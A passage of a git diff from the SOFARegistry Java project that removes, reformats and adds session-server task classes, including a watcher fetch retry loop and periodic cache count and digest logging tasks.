{ - - if (result) { - //change all subscribers push version - subscribers.forEach(subscriber -> subscriber - .checkAndUpdateVersion(receivedData.getSegment(), receivedData.getVersion())); - - taskClosure.run(ProcessingResult.Success, ReceivedDataMultiPushTask.this); - } else { - taskClosure.run(ProcessingResult.PermanentError, ReceivedDataMultiPushTask.this); - } - - }); - } - } - - @Override - public String toString() { - return "RECEIVED_DATA_MULTI_PUSH_TASK{" + "taskId='" + getTaskId() + '\'' - + ", receivedData=" + receivedData + ", url=" + url + ", expiryTime='" - + getExpiryTime() + '\'' + '}'; - } - - @Override - protected boolean checkRetryTimes(int retryTimes) { - int configTimes = sessionServerConfig.getReceivedDataMultiPushTaskRetryTimes(); - if (configTimes > 0) { - return retryTimes <= configTimes; - } - return false; - } - - private long getBlockTime(int retry) { - long initialSleepTime = TimeUnit.MILLISECONDS.toMillis(sessionServerConfig - .getPushDataTaskRetryFirstDelay()); - long increment = TimeUnit.MILLISECONDS.toMillis(sessionServerConfig - .getPushDataTaskRetryIncrementDelay()); - long result = initialSleepTime + (increment * (retry - 1)); - return result >= 0L ? result : 0L; - } - - @Override - public boolean checkRetryTimes() { - return checkRetryTimes(sessionServerConfig.getReceivedDataMultiPushTaskRetryTimes()); - } - - @Override - public void run(ProcessingResult processingResult, Task task) { - if (taskClosure != null) { - taskClosure.run(processingResult, task); - } - } -} \ No newline at end of file diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/SessionRegisterDataTask.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/SessionRegisterDataTask.java deleted file mode 100644 index 0640760ed..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/SessionRegisterDataTask.java +++ /dev/null @@ -1,106 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.scheduler.task; - -import com.alipay.sofa.registry.common.model.dataserver.SessionServerRegisterRequest; -import com.alipay.sofa.registry.common.model.store.URL; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.net.NetUtil; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.remoting.Server; -import com.alipay.sofa.registry.remoting.exchange.Exchange; -import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; -import com.alipay.sofa.registry.server.session.node.SessionProcessIdGenerator; -import com.alipay.sofa.registry.server.session.node.service.DataNodeService; -import com.alipay.sofa.registry.task.listener.TaskEvent; - -import java.util.Collection; -import java.util.HashSet; -import java.util.Set; - -/** - * - * @author shangyu.wh - * @version $Id: SessionRegisterDataTask.java, v 0.1 2018-04-16 16:07 shangyu.wh Exp $ - */ -public class SessionRegisterDataTask extends AbstractSessionTask { - - private static final Logger LOGGER = LoggerFactory.getLogger( - SessionRegisterDataTask.class, "[Task]"); - - private final Exchange boltExchange; - private final DataNodeService dataNodeService; - private final SessionServerConfig sessionServerConfig; - - private SessionServerRegisterRequest sessionServerRegisterRequest; - private URL dataUrl; - - public SessionRegisterDataTask(Exchange boltExchange, DataNodeService dataNodeService, - SessionServerConfig sessionServerConfig) { - this.boltExchange = boltExchange; - this.dataNodeService = dataNodeService; - this.sessionServerConfig = sessionServerConfig; - } - - @Override - public boolean checkRetryTimes() { - return checkRetryTimes(sessionServerConfig.getSessionRegisterDataServerTaskRetryTimes()); - } - - @Override - public void setTaskEvent(TaskEvent taskEvent) { - Object obj = taskEvent.getEventObj(); - - if (obj instanceof URL) { - - this.dataUrl = (URL) obj; - - } else { - throw new IllegalArgumentException("Input task event object error!"); - } - Server sessionServer = boltExchange.getServer(sessionServerConfig.getServerPort()); - - if (sessionServer != null) { - - Collection chs = sessionServer.getChannels(); - Set clientHosts = new HashSet<>(); - chs.forEach(channel -> clientHosts.add(NetUtil.toAddressString(channel.getRemoteAddress()))); - - sessionServerRegisterRequest = new SessionServerRegisterRequest( - SessionProcessIdGenerator.getSessionProcessId(), clientHosts); - } else { - LOGGER.error("get null session server,please check server started before register!port {}", - sessionServerConfig.getServerPort()); - sessionServerRegisterRequest = new SessionServerRegisterRequest( - SessionProcessIdGenerator.getSessionProcessId(), new HashSet<>()); - } - } - - @Override - public void execute() { - dataNodeService.registerSessionProcessId(sessionServerRegisterRequest, dataUrl); - } - - @Override - public String toString() { - return "SESSION_REGISTER_DATA_TASK{" + "taskId='" + taskId + '\'' - + ", sessionServerRegisterRequest=" + sessionServerRegisterRequest.getProcessId() - + ", clientList=" + sessionServerRegisterRequest.getClientHosts().size() - + ", dataUrl=" + dataUrl + '}'; - } -} \ No newline at end of file diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/SessionTask.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/SessionTask.java index eea3c4f93..a8569a445 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/SessionTask.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/SessionTask.java @@ -19,10 +19,7 @@ import com.alipay.sofa.registry.task.Task; /** - * * @author shangyu.wh * @version $Id: SessionTask.java, v 0.1 2017-12-07 20:57 shangyu.wh Exp $ */ -public interface SessionTask extends Task { - -} \ No newline at end of file +public interface SessionTask extends Task {} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/SubscriberMultiFetchTask.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/SubscriberMultiFetchTask.java deleted file mode 100644 index ffb1495c0..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/SubscriberMultiFetchTask.java +++ /dev/null @@ -1,101 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.scheduler.task; - -import com.alipay.sofa.registry.common.model.store.Subscriber; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; -import com.alipay.sofa.registry.server.session.cache.CacheService; -import com.alipay.sofa.registry.server.session.strategy.SubscriberMultiFetchTaskStrategy; -import com.alipay.sofa.registry.task.listener.TaskEvent; -import com.alipay.sofa.registry.task.listener.TaskListenerManager; - -import java.util.Collection; - -/** - * - * @author shangyu.wh - * @version $Id: SubscriberMultiFetchTask.java, v 0.1 2018-11-08 11:54 shangyu.wh Exp $ - */ -public class SubscriberMultiFetchTask extends AbstractSessionTask { - private static final Logger LOGGER = LoggerFactory - .getLogger(SubscriberMultiFetchTask.class); - - private final SessionServerConfig sessionServerConfig; - /** - * trigger task com.alipay.sofa.registry.server.meta.listener process - */ - private final TaskListenerManager taskListenerManager; - - private final CacheService sessionCacheService; - - private String fetchDataInfoId; - - private Collection subscribers; - - private SubscriberMultiFetchTaskStrategy subscriberMultiFetchTaskStrategy; - - public SubscriberMultiFetchTask(SessionServerConfig sessionServerConfig, - TaskListenerManager taskListenerManager, - CacheService sessionCacheService, - SubscriberMultiFetchTaskStrategy subscriberMultiFetchTaskStrategy) { - this.sessionServerConfig = sessionServerConfig; - this.taskListenerManager = taskListenerManager; - this.sessionCacheService = sessionCacheService; - this.subscriberMultiFetchTaskStrategy = subscriberMultiFetchTaskStrategy; - } - - @Override - public void setTaskEvent(TaskEvent taskEvent) { - - Object obj = taskEvent.getEventObj(); - - if (!(obj instanceof String)) { - throw new IllegalArgumentException("Input task event object error!"); - } - - this.fetchDataInfoId = (String) obj; - - subscribers = (Collection) taskEvent - .getAttribute(Constant.PUSH_CLIENT_SUBSCRIBERS); - - if (subscribers.isEmpty()) { - LOGGER.error("Subscriber MultiFetchTask subscribers is empty!"); - throw new RuntimeException( - "Subscriber MultiFetchTask got exception!send subscribers is empty"); - } - } - - @Override - public void execute() { - subscriberMultiFetchTaskStrategy.doSubscriberMultiFetchTask(sessionServerConfig, - taskListenerManager, sessionCacheService, fetchDataInfoId, subscribers); - } - - @Override - public boolean checkRetryTimes() { - return checkRetryTimes(sessionServerConfig.getDataChangeFetchTaskRetryTimes()); - } - - @Override - public String toString() { - return "SUBSCRIBER_MULTI_FETCH_TASK {" + "taskId='" + getTaskId() + '\'' - + ", fetchDataInfoId=" + fetchDataInfoId + ", expiryTime='" + getExpiryTime() + '\'' - + '}'; - } -} \ No newline at end of file diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/SubscriberRegisterFetchTask.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/SubscriberRegisterFetchTask.java deleted file mode 100644 index 815325337..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/SubscriberRegisterFetchTask.java +++ /dev/null @@ -1,94 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.scheduler.task; - -import com.alipay.sofa.registry.common.model.store.Subscriber; -import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; -import com.alipay.sofa.registry.server.session.cache.CacheService; -import com.alipay.sofa.registry.server.session.node.service.DataNodeService; -import com.alipay.sofa.registry.server.session.strategy.SubscriberRegisterFetchTaskStrategy; -import com.alipay.sofa.registry.task.listener.TaskEvent; -import com.alipay.sofa.registry.task.listener.TaskListenerManager; - -/** - * - * @author shangyu.wh - * @version $Id: SubscriberRegisterFetchTask.java, v 0.1 2017-12-07 16:23 shangyu.wh Exp $ - */ -public class SubscriberRegisterFetchTask extends AbstractSessionTask { - - private final SessionServerConfig sessionServerConfig; - /** - * trigger task com.alipay.sofa.registry.server.meta.listener process - */ - private final TaskListenerManager taskListenerManager; - /** - * DataNode service - */ - private final DataNodeService dataNodeService; - - private final CacheService sessionCacheService; - - private final SubscriberRegisterFetchTaskStrategy subscriberRegisterFetchTaskStrategy; - private Subscriber subscriber; - - public SubscriberRegisterFetchTask(SessionServerConfig sessionServerConfig, - TaskListenerManager taskListenerManager, - DataNodeService dataNodeService, - CacheService sessionCacheService, - SubscriberRegisterFetchTaskStrategy subscriberRegisterFetchTaskStrategy) { - this.sessionServerConfig = sessionServerConfig; - this.taskListenerManager = taskListenerManager; - this.dataNodeService = dataNodeService; - this.sessionCacheService = sessionCacheService; - this.subscriberRegisterFetchTaskStrategy = subscriberRegisterFetchTaskStrategy; - } - - @Override - public long getExpiryTime() { - //TODO CONFIG - return -1; - } - - @Override - public void setTaskEvent(TaskEvent taskEvent) { - Object obj = taskEvent.getEventObj(); - - if (!(obj instanceof Subscriber)) { - throw new IllegalArgumentException("Input task event object error!"); - } - - this.subscriber = (Subscriber) obj; - } - - @Override - public void execute() { - subscriberRegisterFetchTaskStrategy.doSubscriberRegisterFetchTask(sessionServerConfig, - taskListenerManager, dataNodeService, sessionCacheService, subscriber); - } - - @Override - public boolean checkRetryTimes() { - return checkRetryTimes(sessionServerConfig.getSubscriberRegisterFetchRetryTimes()); - } - - @Override - public String toString() { - return "SUBSCRIBER_REGISTER_FETCH_TASK{" + "taskId='" + getTaskId() + '\'' - + ", subscriber=" + subscriber + ", expiryTime='" + getExpiryTime() + '\'' + '}'; - } -} \ No newline at end of file diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/WatcherRegisterFetchTask.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/WatcherRegisterFetchTask.java index ad5bdf1b0..e1adaee46 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/WatcherRegisterFetchTask.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/WatcherRegisterFetchTask.java @@ -26,98 +26,129 @@ import com.alipay.sofa.registry.log.LoggerFactory; import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; import com.alipay.sofa.registry.server.session.converter.ReceivedDataConverter; -import com.alipay.sofa.registry.server.session.node.service.MetaNodeService; +import com.alipay.sofa.registry.server.shared.meta.MetaServerService; import com.alipay.sofa.registry.task.listener.TaskEvent; import com.alipay.sofa.registry.task.listener.TaskEvent.TaskType; import com.alipay.sofa.registry.task.listener.TaskListenerManager; - -import java.util.Collections; -import java.util.HashMap; -import java.util.List; -import java.util.Map; +import java.util.*; /** - * * @author shangyu.wh * @version $Id: SubscriberRegisterFetchTask.java, v 0.1 2017-12-07 16:23 shangyu.wh Exp $ */ public class WatcherRegisterFetchTask extends AbstractSessionTask { - private static final Logger taskLogger = LoggerFactory.getLogger( - WatcherRegisterFetchTask.class, "[Task]"); - - private final SessionServerConfig sessionServerConfig; - /** - * trigger push client process - */ - private final TaskListenerManager taskListenerManager; - /** - * Meta Node service - */ - private final MetaNodeService metaNodeService; - - private Watcher watcher; - - public WatcherRegisterFetchTask(SessionServerConfig sessionServerConfig, - TaskListenerManager taskListenerManager, - MetaNodeService metaNodeService) { - this.sessionServerConfig = sessionServerConfig; - this.taskListenerManager = taskListenerManager; - this.metaNodeService = metaNodeService; - } + private static final Logger taskLogger = + LoggerFactory.getLogger(WatcherRegisterFetchTask.class, "[Task]"); + + private final SessionServerConfig sessionServerConfig; + /** trigger push client process */ + private final TaskListenerManager taskListenerManager; + /** Meta Node service */ + private final MetaServerService metaServerService; + + private Watcher watcher; + + private static final int TRY_COUNT = 3; - @Override - public void setTaskEvent(TaskEvent taskEvent) { - Object obj = taskEvent.getEventObj(); + public WatcherRegisterFetchTask( + SessionServerConfig sessionServerConfig, + TaskListenerManager taskListenerManager, + MetaServerService metaServerService) { + this.sessionServerConfig = sessionServerConfig; + this.taskListenerManager = taskListenerManager; + this.metaServerService = metaServerService; + } - if (!(obj instanceof Watcher)) { - throw new IllegalArgumentException("Input task event object error!"); - } + @Override + public void setTaskEvent(TaskEvent taskEvent) { - this.watcher = (Watcher) obj; + // taskId create from event + if (taskEvent.getTaskId() != null) { + setTaskId(taskEvent.getTaskId()); } - @Override - public void execute() { + Object obj = taskEvent.getEventObj(); - if (watcher == null) { - throw new IllegalArgumentException("watcher can not be null!"); - } + if (!(obj instanceof Watcher)) { + throw new IllegalArgumentException("Input task event object error!"); + } - List subscriberRegisterIdList = Collections.singletonList(watcher.getRegisterId()); + this.watcher = (Watcher) obj; + } - boolean isOldVersion = !ClientVersion.StoreData.equals(watcher.getClientVersion()); + @Override + public void execute() { - ProvideData provideData = metaNodeService.fetchData(watcher.getDataInfoId()); - if (provideData != null) { - if (!isOldVersion) { - DataInfo dataInfo = DataInfo.valueOf(provideData.getDataInfoId()); - ReceivedConfigData receivedConfigData = ReceivedDataConverter - .getReceivedConfigData(provideData.getProvideData(), dataInfo, - provideData.getVersion()); - receivedConfigData.setConfiguratorRegistIds(subscriberRegisterIdList); - firePushTask(receivedConfigData); - } - } + if (watcher == null) { + throw new IllegalArgumentException("watcher can not be null!"); } - private void firePushTask(ReceivedConfigData receivedConfigData) { - Map parameter = new HashMap<>(); - parameter.put(receivedConfigData, watcher.getSourceAddress()); - TaskEvent taskEvent = new TaskEvent(parameter, TaskType.RECEIVED_DATA_CONFIG_PUSH_TASK); - taskLogger.info("send " + taskEvent.getTaskType() + " taskEvent:{}", taskEvent); - taskListenerManager.sendTaskEvent(taskEvent); + List subscriberRegisterIdList = Collections.singletonList(watcher.getRegisterId()); + + boolean isOldVersion = !ClientVersion.StoreData.equals(watcher.getClientVersion()); + + ProvideData provideData = null; + + for (int tryCount = 0; tryCount < TRY_COUNT; tryCount++) { + try { + provideData = metaServerService.fetchData(watcher.getDataInfoId()); + break; + } catch (Exception e) { + randomDelay(3000); + } } - @Override - public boolean checkRetryTimes() { - return checkRetryTimes(sessionServerConfig.getSubscriberRegisterFetchRetryTimes()); + if (provideData == null) { + taskLogger.error( + "Fetch provider data error,set null value return.dataInfoId={}", watcher.getDataId()); + provideData = new ProvideData(null, watcher.getDataInfoId(), null); } - @Override - public String toString() { - return "WATCHER_REGISTER_FETCH_TASK{" + "taskId='" + getTaskId() + '\'' + ", watcher=" - + watcher + ", retryTimes='" - + sessionServerConfig.getSubscriberRegisterFetchRetryTimes() + '\'' + '}'; + if (!isOldVersion) { + DataInfo dataInfo = DataInfo.valueOf(provideData.getDataInfoId()); + ReceivedConfigData receivedConfigData = + ReceivedDataConverter.getReceivedConfigData( + provideData.getProvideData(), dataInfo, provideData.getVersion()); + receivedConfigData.setConfiguratorRegistIds(subscriberRegisterIdList); + firePushTask(receivedConfigData); + } + } + + private void firePushTask(ReceivedConfigData receivedConfigData) { + Map parameter = new HashMap<>(); + parameter.put(receivedConfigData, watcher.getSourceAddress()); + TaskEvent taskEvent = new TaskEvent(parameter, TaskType.RECEIVED_DATA_CONFIG_PUSH_TASK); + taskLogger.info("send " + taskEvent.getTaskType() + " taskEvent:{}", taskEvent); + taskListenerManager.sendTaskEvent(taskEvent); + } + + @Override + public boolean checkRetryTimes() { + return checkRetryTimes(sessionServerConfig.getSubscriberRegisterFetchRetryTimes()); + } + + private void randomDelay(int max) { + Random random = new Random(); + int randomNum = random.nextInt(max); + try { + Thread.sleep(randomNum); + } catch (InterruptedException e) { + taskLogger.error("[TimeUtil] random delay error", e); } -} \ No newline at end of file + } + + @Override + public String toString() { + return "WATCHER_REGISTER_FETCH_TASK{" + + "taskId='" + + getTaskId() + + '\'' + + ", watcher=" + + watcher + + ", retryTimes='" + + sessionServerConfig.getSubscriberRegisterFetchRetryTimes() + + '\'' + + '}'; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/timertask/CacheCountTask.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/timertask/CacheCountTask.java new file mode 100644 index 000000000..5f6e14810 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/timertask/CacheCountTask.java @@ -0,0 +1,137 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.scheduler.timertask; + +import com.alipay.sofa.registry.common.model.DataUtils; +import com.alipay.sofa.registry.common.model.Tuple; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.common.model.store.Subscriber; +import com.alipay.sofa.registry.common.model.store.Watcher; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; +import com.alipay.sofa.registry.server.session.store.DataStore; +import com.alipay.sofa.registry.server.session.store.Interests; +import com.alipay.sofa.registry.server.session.store.Watchers; +import com.alipay.sofa.registry.util.ConcurrentUtils; +import com.alipay.sofa.registry.util.NamedThreadFactory; +import java.util.List; +import java.util.Map; +import java.util.Map.Entry; +import java.util.concurrent.ScheduledExecutorService; +import java.util.concurrent.ScheduledThreadPoolExecutor; +import java.util.concurrent.TimeUnit; +import javax.annotation.PostConstruct; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author qian.lqlq + * @version $Id: CacheDigestTask.java, v 0.1 2018-04-27 17:40 qian.lqlq Exp $ + */ +public class CacheCountTask { + private static final Logger LOGGER = + LoggerFactory.getLogger(CacheCountTask.class, "[CacheCountTask]"); + private static final Logger COUNT_LOGGER = LoggerFactory.getLogger("CACHE-COUNT"); + + @Autowired DataStore sessionDataStore; + + @Autowired Interests sessionInterests; + + @Autowired Watchers sessionWatchers; + + @Autowired SessionServerConfig sessionServerConfig; + + @PostConstruct + public boolean init() { + final int intervalSec = sessionServerConfig.getCacheCountIntervalSecs(); + if (intervalSec <= 0) { + LOGGER.info("cache count off with intervalSecs={}", intervalSec); + return false; + } + ScheduledExecutorService executor = + new ScheduledThreadPoolExecutor(1, new NamedThreadFactory("CacheCountTask")); + executor.scheduleWithFixedDelay(() -> syncCount(), intervalSec, intervalSec, TimeUnit.SECONDS); + return true; + } + + boolean syncCount() { + try { + List pubs = sessionDataStore.getDataList(); + List subs = sessionInterests.getDataList(); + List wats = sessionWatchers.getDataList(); + + Map>> pubGroupCounts = + DataUtils.countGroupByInstanceIdGroup(pubs); + printInstanceIdGroupCount("[PubGroup]", pubGroupCounts); + + Map>> subGroupCounts = + DataUtils.countGroupByInstanceIdGroup(subs); + printInstanceIdGroupCount("[SubGroup]", subGroupCounts); + + Map>> watGroupCounts = + DataUtils.countGroupByInstanceIdGroup(wats); + printInstanceIdGroupCount("[WatGroup]", watGroupCounts); + + Map>>> pubCounts = + DataUtils.countGroupByInstanceIdGroupApp(pubs); + printInstanceIdGroupAppCount("[Pub]", pubCounts); + + Map>>> subCounts = + DataUtils.countGroupByInstanceIdGroupApp(subs); + printInstanceIdGroupAppCount("[Sub]", subCounts); + + Map>>> watCounts = + DataUtils.countGroupByInstanceIdGroupApp(wats); + printInstanceIdGroupAppCount("[Wat]", watCounts); + return true; + } catch (Throwable e) { + LOGGER.error("cache count error", e); + return false; + } + } + + private static void printInstanceIdGroupAppCount( + String prefix, Map>>> counts) { + for (Entry>>> count : + counts.entrySet()) { + final String instanceId = count.getKey(); + for (Entry>> groupCounts : + count.getValue().entrySet()) { + final String group = groupCounts.getKey(); + for (Entry> apps : groupCounts.getValue().entrySet()) { + final String app = apps.getKey(); + Tuple tupleCount = apps.getValue(); + COUNT_LOGGER.info( + "{}{},{},{},{},{}", prefix, instanceId, group, app, tupleCount.o1, tupleCount.o2); + } + ConcurrentUtils.sleepUninterruptibly(100, TimeUnit.MILLISECONDS); + } + } + } + + private static void printInstanceIdGroupCount( + String prefix, Map>> counts) { + for (Entry>> count : counts.entrySet()) { + final String instanceId = count.getKey(); + for (Entry> groups : count.getValue().entrySet()) { + final String group = groups.getKey(); + Tuple tupleCount = groups.getValue(); + COUNT_LOGGER.info("{}{},{},{},{}", prefix, instanceId, group, tupleCount.o1, tupleCount.o2); + } + } + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/timertask/SessionCacheDigestTask.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/timertask/SessionCacheDigestTask.java new file mode 100644 index 000000000..6d474e8f2 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/timertask/SessionCacheDigestTask.java @@ -0,0 +1,117 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.scheduler.timertask; + +import com.alipay.sofa.registry.common.model.store.BaseInfo; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.common.model.store.Subscriber; +import com.alipay.sofa.registry.common.model.store.URL; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; +import com.alipay.sofa.registry.server.session.store.DataStore; +import com.alipay.sofa.registry.server.session.store.Interests; +import com.alipay.sofa.registry.util.ConcurrentUtils; +import java.util.*; +import java.util.concurrent.TimeUnit; +import java.util.stream.Collectors; +import javax.annotation.PostConstruct; +import org.apache.commons.lang.time.DateUtils; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author xiaojian.xj + * @version $Id: SessionCacheDigestTask.java, v 0.1 2020年08月03日 14:37 xiaojian.xj Exp $ + */ +public class SessionCacheDigestTask { + + private static final Logger LOGGER = LoggerFactory.getLogger("CACHE-DIGEST"); + + @Autowired DataStore sessionDataStore; + + @Autowired Interests sessionInterests; + + @Autowired SessionServerConfig sessionServerConfig; + + @PostConstruct + public boolean init() { + final int intervalMinutes = sessionServerConfig.getCacheDigestIntervalMinutes(); + if (intervalMinutes <= 0) { + LOGGER.info("cache digest off with intervalMinutes={}", intervalMinutes); + return false; + } + Date firstDate = new Date(); + firstDate = DateUtils.round(firstDate, Calendar.MINUTE); + firstDate.setMinutes( + firstDate.getMinutes() / intervalMinutes * intervalMinutes + intervalMinutes); + Timer timer = new Timer("CacheDigestTask", true); + TimerTask task = + new TimerTask() { + @Override + public void run() { + dump(); + } + }; + timer.scheduleAtFixedRate(task, firstDate, intervalMinutes * 60 * 1000); + return true; + } + + boolean dump() { + try { + Collection storeDataInfoIds = sessionDataStore.getDataInfoIds(); + Collection interestDataInfoIds = sessionInterests.getDataInfoIds(); + Set dataInfoIds = new HashSet<>(storeDataInfoIds.size() + interestDataInfoIds.size()); + + dataInfoIds.addAll(storeDataInfoIds); + dataInfoIds.addAll(interestDataInfoIds); + + dataInfoIds.stream() + .forEach( + dataInfoId -> { + Collection publishers = sessionDataStore.getDatas(dataInfoId); + Collection subscribers = sessionInterests.getDatas(dataInfoId); + + LOGGER.info( + "[dataInfo] {}; {}; {}; {}; [{}]; [{}]", + sessionServerConfig.getSessionServerDataCenter(), + dataInfoId, + publishers.size(), + subscribers.size(), + logPubOrSub(publishers), + logPubOrSub(subscribers)); + // avoid io is too busy + ConcurrentUtils.sleepUninterruptibly(2, TimeUnit.MILLISECONDS); + }); + return true; + } catch (Throwable t) { + LOGGER.error("[CacheDigestTask] cache digest error", t); + return false; + } + } + + private String logPubOrSub(Collection infos) { + + return Optional.ofNullable(infos).orElse(new ArrayList<>()).stream() + .filter(info -> info != null) + .map(info -> logUrl(info.getSourceAddress())) + .collect(Collectors.joining(",")); + } + + private String logUrl(URL url) { + return url == null ? "null" : url.getAddressString(); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/timertask/SyncClientsHeartbeatTask.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/timertask/SyncClientsHeartbeatTask.java index 7f2d58464..26f7eecd9 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/timertask/SyncClientsHeartbeatTask.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/timertask/SyncClientsHeartbeatTask.java @@ -19,168 +19,158 @@ import com.alipay.sofa.registry.log.Logger; import com.alipay.sofa.registry.log.LoggerFactory; import com.alipay.sofa.registry.metrics.TaskMetrics; -import com.alipay.sofa.registry.server.session.listener.ReceivedDataMultiPushTaskListener; -import com.alipay.sofa.registry.server.session.scheduler.ExecutorManager; +import com.alipay.sofa.registry.remoting.Server; +import com.alipay.sofa.registry.remoting.exchange.Exchange; +import com.alipay.sofa.registry.server.session.bootstrap.ExecutorManager; +import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; import com.alipay.sofa.registry.server.session.store.DataStore; import com.alipay.sofa.registry.server.session.store.Interests; import com.alipay.sofa.registry.server.session.store.Watchers; import com.alipay.sofa.registry.task.batcher.AcceptorExecutor; import com.alipay.sofa.registry.task.batcher.TaskDispatcher; import com.alipay.sofa.registry.task.batcher.TaskDispatchers; -import com.alipay.sofa.registry.task.listener.TaskListener; import com.codahale.metrics.Gauge; import com.codahale.metrics.MetricRegistry; -import org.springframework.beans.factory.annotation.Autowired; -import org.springframework.scheduling.annotation.Scheduled; - import java.util.Iterator; import java.util.Map; import java.util.Map.Entry; import java.util.concurrent.ThreadPoolExecutor; +import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.scheduling.annotation.Scheduled; /** * The type Sync clients heartbeat task. + * * @author zhuoyu.sjw * @version $Id : SyncClientsHeartbeatTask.java, v 0.1 2018-03-31 16:07 zhuoyu.sjw Exp $$ */ public class SyncClientsHeartbeatTask { - private static final Logger CONSOLE_COUNT_LOGGER = LoggerFactory.getLogger("SESSION-CONSOLE", - "[Count]"); - - private static final Logger PRO_LOGGER = 